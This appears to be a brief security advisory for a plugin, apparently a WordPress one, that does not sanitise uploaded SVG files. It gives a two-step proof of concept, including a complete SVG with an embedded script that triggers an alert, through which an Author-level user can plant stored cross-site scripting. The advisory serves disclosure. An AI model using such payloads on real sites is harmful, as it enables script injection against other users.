The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.
1. Upload a malicious SVG: <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <script type="text/javascript"> alert("XSS Test"); </script> </svg>
2. Add to post and view SVG to see XSS.